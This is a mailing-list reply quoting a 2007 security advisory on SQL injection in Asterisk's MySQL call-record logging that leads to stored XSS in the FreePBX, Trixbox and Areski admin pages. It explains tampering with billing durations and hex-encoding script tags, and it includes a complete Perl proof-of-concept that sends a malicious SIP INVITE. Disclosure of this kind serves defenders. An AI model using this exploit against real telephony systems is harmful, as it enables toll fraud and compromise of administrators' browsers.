LOL !!!!XSS!!!!


On 10/19/07, Radu State <[EMAIL PROTECTED]> wrote:
>  In a previous post (
> ,  we have seen how XSS injection can be performed over SIP to inject
> malicious JavaScript into the browser of an user that check  the call
> history of his phone.  In this post, we will detail how XSS injection can be
> performed over SIP by an additional SQL injection.
> Some SIP proxies store information gathered from SIP headers into databses
> used  for billing and accounting purposes. This is also the case for the
> vulnerability disclosed In the following.  If this information is not
> properly filtered, once it will be displayed to the administrator it can
> perform a second order SQL Injection, that is : during the display, it gets
> interpreted as SQL by the application.  In this case, two things can result:
> First, the database can be changed (for instance the call length can be
> changed to a small value and thus the caller can do toll fraud. Sometimes,
> if the target system is not well secured, SQL injection can lead to system
> compromise because most database server allow some interaction with the
> target OS.
> However, the additional feature is that XSS can also result, because
> JavaScript can be stored into the database with the SQL injection  and
> executed on the browser when the admin will check it (this is a kind of log
> Injection process). As was pointed out in my previous posting, XSS can be
> used with tools like Beef and XSS proxy to scan the internal network,
> deactivate firewalls, basically all the dangers of CSRF/XSRF are not a
> reality. The main issue is that most applications that deal with CDR data
> are not considering this type of threat.
> * *
> *Title :* SQL injection in asterisk-addons and XSS injection in WWW
> application in Areski, FreePBX and Trixbox
> Id: KIPH 12*
> *
> *Credits *
> *Humberto Abdelnur (Ph.D student) the Madynes group at INRIA *
> *Radu** State** (Ph.D), the Madynes group at INRIA *
> *Olivier Festor (Ph.D), the Madynes group at INRIA *
> * *
> *Software version for which vendors were notified:*
> Asterisk-addon (SQL injection)
> Areski v 2.0.1 and earlier (XSS injection)
> FreePBX (2.3.00 and earlier) XSS injection
> Tribox v.2.3.1 and earlier (XSS injection)
>  *Severity:*  High, XSS and  SQL injection can lead to the compromise of
> an internal network
> *Overview:
> *
> Asterisk as itself does not support billing reports but provide libraries,
> asterisk-addon, which may allow a third entity to compute them. Specifically
> the functions exported by cdr_addon_mysql.c allows to log the Call Detail
> Records  (CDR) in the MySQL database.
> Areski, FreePBX and Trixbox use the information stored in such database in
> order to manage, compute generate billing reports or  display  the load of
> the PBX.
> *Vulnerability Synopsis:*
> Certain functions in cdr_addon_mysql.c do not properly escaped input
> characters from fields of incoming calls before to stored them in the
> database. This issue will allow, to a malicious user,  two main attacks:
>    1.  Inject SQL statements which will obfuscate the quantity of
>    minute made for the billing
>    2.  Inject through the SQL statement values which will be recognized
>    as a Java script when a WWW management application for CDR run.
> The attack may be performed by an unsubscribed user in the domain (if
> anonymous calls are allowed).
> This attacker may inject negative number in the CDR table in order to
> decrease the minutes of calling. Also, the attacker may inject Java Script
> tags to be executed by the administrator PC when she/he enter to the CDR
> website.
> Note that in order to perform the Cross Script injection, the SQL
> injection technique is necessary due that special characters as "<" are to
> be filtered by asterisk, while with the SQL injection they can be rewritten
> as 0x60 (Hexadecimal representation) which wont be filtered.
> *Impact:*
> Information from the database can be manipulated for malicious used.
> Execution of malicious scripts may be executed in the administrator
> machine.
> *Proof of Concept:*
> The script will create an entry with duration values -9 and
> <script>alert(1)</script> that will be show when the administrator check the
> website.
> *Command**: * <callUser> <targetIP>
> <targetPort> <attackerUser> <localIP> <localPort>
> --
> #!/usr/bin/perl
> #############################################
> # Vulnerabily discovered using KiF ~ Kiph   #
> #                                           #
> # Authors:                                  #
> #             Humberto J. Abdelnur (Ph.D Student)     #
> #             Radu State (Ph.D)                       #
> #             Olivier Festor (Ph.D)                   #
> #                                           #
> # Madynes Team, LORIA - INRIA Lorraine      #
> #                   #
> #############################################
> use IO::Socket::INET;
> use String::Random;
> $foo = new String::Random;
> die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP>
> <localPort>" unless ($ARGV[5]);
> sub iso2hex($) {
>           my $hex = '';
>           for (my $i = 0; $i < length($_[0]); $i++) {
>                   my $ordno = ord substr($_[0], $i, 1);
>                   $hex .= sprintf("%lx", $ordno);
>           }
>           $hex =~ s/ $//;;
>           $hex;
> }
> $callUser = $ARGV[0];
> $targetIP = $ARGV[1];
> $targetPort = $ARGV[2];
> $attackerUser = $ARGV[3];
> $attackerIP= $ARGV[4];
> $attackerPort= $ARGV[5];
> $socket=new IO::Socket::INET->new(
>                                Proto=>'udp',
>                                PeerPort=>$targetPort,
>         PeerAddr=>$targetIP,
>                                LocalPort=>$attackerPort);
> $scriptinjection= iso2hex("<script>alert(1)</script>");
> $sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*";
> $callid= $foo->randpattern("CCccnCn");
> $cseq = $foo->randregex('\d\d\d\d');
> $sdp = "v=0\r
> o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
> s=-\r
> c=IN IP4 $attackerIP\r
> t=0 0\r
> m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
> a=sendrecv\r
> a=ptime:20\r
> a=maxptime:200\r
> a=fmtp:96 mode-change-neighbor=1\r
> a=fmtp:18 annexb=no\r
> a=fmtp:98 0-15\r
> a=rtpmap:96 AMR/8000/1\r
> a=rtpmap:0 PCMU/8000/1\r
> a=rtpmap:8 PCMA/8000/1\r
> a=rtpmap:97 iLBC/8000/1\r
> a=rtpmap:18 G729/8000/1\r
> a=rtpmap:98 telephone-event/8000/1\r
> a=rtpmap:13 CN/8000/1\r
> ";
> $sdplen= length $sdp;
> $msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r
> From: <sip:[EMAIL PROTECTED]>;tag=1\r
> To: <sip:[EMAIL PROTECTED]>\r
> CSeq: $cseq INVITE\r
> Max-Forwards: 70\r
> Contact: <sip:[EMAIL PROTECTED]>\r
> Content-Type: application/sdp\r
> Content-Length: $sdplen\r
> \r
> $sdp";
> $socket->send($msg);
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